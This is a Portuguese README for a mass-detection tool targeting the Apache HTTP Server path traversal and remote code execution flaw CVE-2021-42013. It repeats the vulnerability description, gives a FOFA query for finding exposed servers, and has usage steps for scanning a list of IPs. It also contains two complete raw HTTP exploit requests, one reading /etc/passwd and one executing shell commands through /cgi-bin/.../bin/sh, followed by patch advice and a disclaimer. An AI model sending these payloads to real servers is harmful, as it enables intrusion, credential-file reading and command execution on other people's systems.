
Ferramenta de detecção em massa de execução remota de código no Apache (CVE-2021-42013): O Apache HTTP Server é um servidor web de código aberto mantido pela Apache Software Foundation (EUA). Ele é rápido, confiável e pode ser estendido por meio de uma API simples. Descobriu-se que a correção para CVE-2021-41773 no Apache HTTP Server 2.4.50 foi insuficiente. Um atacante pode usar um ataque de path traversal para mapear URLs para arquivos fora dos diretórios configurados por diretivas como Alias. Se esses arquivos fora dos diretórios não estiverem protegidos pela configuração padrão "Require all denied", essas solicitações podem ser bem-sucedidas. Se scripts CGI também estiverem habilitados para esses caminhos de alias, isso pode permitir a execução remota de código. Este problema afeta apenas o Apache 2.4.49 e o Apache 2.4.50, não versões anteriores.
Execução Remota de Código no Apache (CVE-2021-42013)
O Apache HTTP Server é um servidor web de código aberto da Apache Software Foundation. Ele é rápido, confiável e pode ser estendido por meio de APIs simples. Descobriu-se que a correção para CVE-2021-41773 no Apache HTTP Server 2.4.50 foi insuficiente. Um atacante pode usar um ataque de path traversal para mapear URLs para arquivos fora dos diretórios configurados por diretivas como Alias. Se esses arquivos fora do diretório não estiverem protegidos pela configuração padrão "Require all denied", as solicitações podem ter sucesso. Se scripts CGI também estiverem habilitados para esses caminhos de alias, isso pode permitir a execução remota de código. Este problema afeta apenas Apache 2.4.49 e Apache 2.4.50, não versões anteriores.
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50
server="Apache/2.4.49" || server="Apache/2.4.50"
1. Coloque os endereços IP a serem verificados no arquivo ip.txt
2. Execute python3 check.py
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57
echo Content-Type: text/plain; echo;ls /

Atualmente, estas vulnerabilidades já foram corrigidas. Devido à gravidade, recomenda-se que os usuários afetados atualizem imediatamente para o Apache HTTP Server 2.4.51 (lançado em 7 de outubro) ou versão superior.
Link para download:
https://httpd.apache.org/download.cgi#apache24
Esta ferramenta é fornecida apenas para que testadores de segurança realizem autoavaliações. O autor não se responsabiliza por qualquer uso indevido por parte dos usuários. Os usuários devem cumprir as leis locais. Este programa não pode ser usado para fins comerciais, apenas para aprendizado e troca.
